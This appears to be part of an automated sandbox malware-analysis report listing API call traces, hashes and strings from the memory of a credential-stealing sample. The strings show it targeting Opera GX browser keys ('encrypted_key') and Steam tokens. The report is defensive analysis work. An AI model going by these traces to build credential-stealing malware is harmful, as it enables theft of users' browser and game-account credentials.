                                                                                                                                                                    • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C7930BE
                                                                                                                                                                      • Part of subcall function 6C7930F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C793127
                                                                                                                                                                      • Part of subcall function 6C7930F0: __aulldiv.LIBCMT ref: 6C793140
                                                                                                                                                                      • Part of subcall function 6C7CAB2A: __onexit.LIBCMT ref: 6C7CAB30
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4291168024-0
                                                                                                                                                                    • Opcode ID: 121ad497222ad1bbd0cea3e8e4e0f67320c821fef7417ceffcaa9dd7d6432249
                                                                                                                                                                    • Instruction ID: 2bc036f856198b45bcfcac470dd91f38975197bde8e80b84b264487478041588
                                                                                                                                                                    • Opcode Fuzzy Hash: 121ad497222ad1bbd0cea3e8e4e0f67320c821fef7417ceffcaa9dd7d6432249
                                                                                                                                                                    • Instruction Fuzzy Hash: A0F0D632E2074A96CA20DF3499861A673B4AF7B218F101329E85963A21FB2065D8C3C2
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                                    • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4203777966-0
                                                                                                                                                                    • Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                                                                    • Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
                                                                                                                                                                    • Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                                                                    • Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F
                                                                                                                                                                      • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                      • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                                                                    • String ID: Opera GX
                                                                                                                                                                    • API String ID: 1719890681-3280151751
                                                                                                                                                                    • Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                                                                    • Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
                                                                                                                                                                    • Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                                                                    • Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 544645111-3916222277
                                                                                                                                                                    • Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                                                                    • Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
                                                                                                                                                                    • Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                                                                    • Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00416FFE
                                                                                                                                                                      • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                      • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                    Strings
                                                                                                                                                                    • Soft\Steam\steam_tokens.txt, xrefs: 0041700E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                    • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                    • API String ID: 502913869-3507145866
                                                                                                                                                                    • Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                                                                    • Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
                                                                                                                                                                    • Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                                                                    • Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5
                                                                                                                                                                    APIs
                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocLocal
                                                                                                                                                                    • String ID: 1iA
                                                                                                                                                                    • API String ID: 3494564517-1863120733
                                                                                                                                                                    • Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                                                                    • Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
                                                                                                                                                                    • Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                                                                    • Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                    • Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                                                                    • Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
                                                                                                                                                                    • Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                                                                    • Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715
                                                                                                                                                                    APIs
                                                                                                                                                                    • malloc.MSVCRT ref: 0041CBC9
                                                                                                                                                                      • Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
                                                                                                                                                                      • Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
                                                                                                                                                                      • Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1
                                                                                                                                                                    • malloc.MSVCRT ref: 0041CC06
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: malloc$lstrcpylstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2974738957-0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    APIs
                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FolderPathlstrcpy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1699248803-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2803490479-0
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2803490479-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C7A6CCC
                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C7A6D11
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0000000C), ref: 6C7A6D26
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C7A6D35
                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C7A6D53
                                                                                                                                                                    • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C7A6D73
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7A6D80
                                                                                                                                                                    • CertGetNameStringW.CRYPT32 ref: 6C7A6DC0
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6C7A6DDC
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C7A6DEB
                                                                                                                                                                    • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C7A6DFF
                                                                                                                                                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C7A6E10
                                                                                                                                                                    • CryptMsgClose.CRYPT32(00000000), ref: 6C7A6E27
                                                                                                                                                                    • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C7A6E34
                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C7A6EF9
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6C7A6F7D
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C7A6F8C
                                                                                                                                                                    • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C7A709D
                                                                                                                                                                    • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C7A7103
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7A7153
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6C7A7176
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A7209
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A723A
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A726B
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A729C
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A72DC
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A730D
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C7A73C2
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A73F3
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A73FF
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A7406
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A740D
                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C7A741A
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C7A755A
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C7A7568
                                                                                                                                                                    • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C7A7585
                                                                                                                                                                    • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C7A7598
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7A75AC
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                    • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                    • API String ID: 3256780453-3980470659
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7DF09B
                                                                                                                                                                      • Part of subcall function 6C7B5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5B85
                                                                                                                                                                      • Part of subcall function 6C7B5B50: EnterCriticalSection.KERNEL32(6C81F688,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5B90
                                                                                                                                                                      • Part of subcall function 6C7B5B50: LeaveCriticalSection.KERNEL32(6C81F688,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5BD8
                                                                                                                                                                      • Part of subcall function 6C7B5B50: GetTickCount64.KERNEL32 ref: 6C7B5BE4
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C7DF0AC
                                                                                                                                                                      • Part of subcall function 6C7B5C50: GetTickCount64.KERNEL32 ref: 6C7B5D40
                                                                                                                                                                      • Part of subcall function 6C7B5C50: EnterCriticalSection.KERNEL32(6C81F688), ref: 6C7B5D67
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C7DF0BE
                                                                                                                                                                      • Part of subcall function 6C7B5C50: __aulldiv.LIBCMT ref: 6C7B5DB4
                                                                                                                                                                      • Part of subcall function 6C7B5C50: LeaveCriticalSection.KERNEL32(6C81F688), ref: 6C7B5DED
                                                                                                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C7DF155
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF1E0
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF1ED
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF212
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF229
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF231
                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C7DF248
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF2AE
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF2BB
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF2F8
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: GetCurrentProcess.KERNEL32(?,6C7931A7), ref: 6C7CCBF1
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7931A7), ref: 6C7CCBFA
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF350
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF35D
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF381
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF398
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF3A0
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF489
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF491
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C7DF3CF
                                                                                                                                                                      • Part of subcall function 6C7DF070: GetCurrentThreadId.KERNEL32 ref: 6C7DF440
                                                                                                                                                                      • Part of subcall function 6C7DF070: AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF44D
                                                                                                                                                                      • Part of subcall function 6C7DF070: ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF472
                                                                                                                                                                    • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C7DF4A8
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF559
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DF561
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF577
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF585
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DF5A3
                                                                                                                                                                    Strings
                                                                                                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6C7DF3A8
                                                                                                                                                                    • [I %d/%d] profiler_resume, xrefs: 6C7DF239
                                                                                                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6C7DF499
                                                                                                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C7DF56A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
                                                                                                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                    • API String ID: 565197838-2840072211
